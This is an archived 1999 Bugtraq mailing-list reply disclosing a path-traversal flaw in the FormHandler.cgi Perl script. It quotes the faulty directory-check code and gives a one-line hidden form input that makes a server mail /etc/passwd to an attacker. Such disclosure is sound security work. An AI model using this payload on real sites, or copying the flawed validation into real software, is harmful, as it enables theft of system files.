Bugtraq mailing list archives
Re: FormHandler.cgi
From: marcys () FREE COM PL (m4rcyS)
Date: Tue, 16 Nov 1999 16:46:33 +0100
On Fri, 12 Nov 1999, Mnemonix wrote:
A quick search of the databases didn't show anything about this particular problem though the principle is well recognised as an issue: FormHandler.cgi available from http://www.cgi-perl.com/programs/FormHandler uses hard coded physical paths for templates etc so it's possible to get sensitive files like /etc/passwd by modifying a site's form and submitting it. Cheers, David Litchfield http://www.infowar.co.uk/mnemonix/ Cerberus Information Security +44(0)181 661 7405
Yeah, Matt's scripts security is a legend ;) Concrete example (formhandler.cgi v2.0) - you can download ANY file which user nobody has read perms to by attaching it to reply mail. Piece'o'code: @ALLOWED_ATTACH_DIRS = ('all'); # hmm, nice defaults ;) @RESTRICTED_ATTACH_DIRS = ('/etc/'); [...] if (&valid_directory($filename)) { # let's check if file is allowed push(@files, $filename); [...] } # to send [...] sub valid_directory { local ($filename) = $_[0]; local ($allowed_path, $restricted_path); local($valid_dir) = 0; if ($ALLOWED_ATTACH_DIRS[0] =~ /^all$/i) { $valid_dir = 1 } else { foreach $allowed_path (@ALLOWED_ATTACH_DIRS) { $valid_dir = ($filename =~ /^$allowed_path/); # silly ... last if $valid_dir; } } foreach $restricted_path (@RESTRICTED_ATTACH_DIRS) { $valid_dir = ($filename !~ /^$restricted_path/); # once more last if !$valid_dir; } return $valid_dir; } [...] How to d/l /etc/passwd ? Just add this to the form: <INPUT TYPE="hidden" NAME="reply_message_attach" VALUE="text:/tmp/../etc/passwd"> ... and voila, now wait for /etc/passwd to come to your mailbox. You can do exactly the same if @ALLOWED_ATTACH_DIRS is not set to "all". Trivial, isn't it ? It's just a one little sample of Matt's code. I think that we all have seen enough examples of his creativity. This topic can become a never-ending-story . Aleph, what do you think about killing every thread with "Matt" and "CGI" keywords in topic ? ;)) greetz, ____________________________________________________________ m4rcyS email: marcys () free com pl, m () sh pl "I think there is a world market for maybe five computers." - Thomas Watson, chairman of IBM, 1943 ------------------------------------------------------------
Current thread:
- F5 Networks Security Advisory (fwd) Gwendolynn ferch Elydyr (Nov 10)
- Re: F5 Networks Security Advisory (fwd) pedward () WEBCOM COM (Nov 10)
- Re: F5 Networks Security Advisory (fwd) Mike Johnson (Nov 11)
- Re: F5 Networks Security Advisory (fwd) pedward () WEBCOM COM (Nov 11)
- FormHandler.cgi Mnemonix (Nov 11)
- Re: FormHandler.cgi m4rcyS (Nov 16)
- hping2 antirez () INVECE ORG (Nov 16)
- Re: F5 Networks Security Advisory (fwd) Mike Johnson (Nov 11)
- Re: F5 Networks Security Advisory (fwd) Rogier Wolff (Nov 12)
- Re: F5 Networks Security Advisory (fwd) pedward () WEBCOM COM (Nov 10)